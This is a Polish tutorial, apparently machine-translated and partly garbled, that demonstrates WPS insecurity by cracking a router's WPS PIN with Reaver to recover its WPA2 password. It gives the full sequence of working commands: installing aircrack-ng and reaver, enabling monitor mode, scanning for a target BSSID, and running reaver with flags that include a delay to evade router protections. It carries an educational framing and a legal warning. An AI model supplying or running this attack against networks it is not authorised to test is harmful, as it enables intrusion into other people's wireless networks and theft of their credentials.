Cel
Zademonstruj potrzebę wyłączenia WPS poprzez uzyskanie hasła WPA2 za pomocą Reavera.
Dystrybucje
To będzie działać na wszystkich dystrybucjach, ale zalecany jest Kali.
Wymagania
Działająca instalacja Linuksa z uprawnieniami roota na komputerze z kartą bezprzewodową.
Trudność
Łatwe
Zastrzeżenia
- # – wymaga, aby podane polecenia linuksowe były wykonywane z uprawnieniami roota albo bezpośrednio jako użytkownik root, albo przez użycie polecenia
sudo
- $ – wymaga, aby podane polecenia linuksowe były wykonywane jako zwykły nieuprzywilejowany użytkownik
Wprowadzenie
WPS to śmieci. Nie używaj go. Nigdy go nie używaj. Nie ma absolutnie żadnego usprawiedliwienia, aby go używać. Ten przewodnik przeprowadzi cię przez etapy łamania WPS w celu uzyskania hasła WPA sieci bezprzewodowej.
Ten przewodnik służy wyłącznie celom edukacyjnym. Używanie tego procesu w sieci, której nie jesteś właścicielem, jest nielegalne.
Instalacja Aircrack i Reaver
Kali Linux ma wszystko, czego potrzebujesz zainstalowane i gotowe do pracy. Jeśli korzystasz z innej dystrybucji, będziesz musiał zainstalować zarówno aircrack-ng
jak i reaver
.
$ sudo apt install aircrack-ng reaver
Skanuj swoją sieć
Znajdź nazwę swojego interfejsu bezprzewodowego za pomocą ip a
. Następnie użyj jej do uruchomienia wirtualnego interfejsu monitorującego za pomocą airmon-ng
.
$ sudo airmon-ng start wlan0
Przyjrzyj się wynikowym danym wyjściowym i znajdź nazwę utworzonego wirtualnego interfejsu. Użyj airodump-ng
, aby wyświetlić w terminalu aktywność sieci bezprzewodowej w twoim obszarze.
$ sudo airodump-ng mon0
Zakończ swoją sieć na wynikowej tabeli. Odnotuj BSSID i kanał swojej sieci. Gdy będziesz je miał, możesz zatrzymać airodump-ng
.
Launch Your Attack With Reaver
Masz wszystko, czego potrzebujesz, aby rozpocząć atak za pomocą Reavera. Reaver pobierze informacje o Twojej sieci i użyje ich do wypróbowania każdego możliwego kodu PIN WPS. Liczba dostępnych kodów PIN jest ograniczona, więc w końcu go znajdzie. Zajmie to trochę czasu, ale gdy już go znajdzie, Reaver użyje kodu PIN, aby uzyskać hasło do Twojej sieci.
Komenda potrzebna do przeprowadzenia ataku zawiera kilka obowiązkowych flag. Ten przewodnik będzie obejmować każdy kawałek najpierw. Następnie połączy je w całość.
Oczywiście, polecenie zaczyna się od nazwy programu. Następny kawałek, trudne, jest interfejs, że Reaver będzie używać.
$ sudo reaver -i mon0
Następnie, trzeba dać Reaver BSSID routera, że to idzie po.
-b XX:XX:XX:XX:XX:XX
Jest to dobry pomysł, aby dodać opóźnienie między próbami PIN. Pomoże to obejść wszelkie potencjalne zabezpieczenia routera może mieć. W tym przypadku, opóźnienie wynosi 10 sekund. To może być nieco ekstremalne. Możesz zmniejszyć czas trwania, jeśli chcesz.
-d 10
Kolejne dwie opcje przyspieszyć proces i pomóc zminimalizować potencjalne problemy.
-S -N
Na koniec możesz wybrać, jak chcesz, aby to polecenie działało. Zajmuje ono dużo czasu, więc możesz je demonizować. Jeśli chcesz tylko tłumić wiadomości, możesz to zrobić. Jeśli wolisz iść w przeciwnym kierunku, możesz powiedzieć Reaverowi, aby był tak dosłowny jak to tylko możliwe.
Daemonize
-D
Quiet
-q
Verbose
-vv
Tak wygląda to wszystko razem.
$ sudo reaver -i mon0 -b XX:XX:XX:XX:XX:XX -d 10 -S -N -vv
Reaver prawdopodobnie zajmie kilka godzin, aby odkryć twój PIN, ale kiedy to zrobi, wyświetli wszystkie istotne informacje w oknie terminala, w tym hasło sieciowe.
Myślenie końcowe
Jasno widać, że w tym momencie nie ma możliwości odkupienia WPS. O ile technologia nie zostanie gruntownie przebudowana, będzie nadal stanowić ogromną dziurę w zabezpieczeniach. Choć może wydawać się wygodne, wszelkie korzyści może pozwolić jest niczym w porównaniu do ryzyka. Jeśli masz WPS włączone na routerze, wyłączyć go teraz.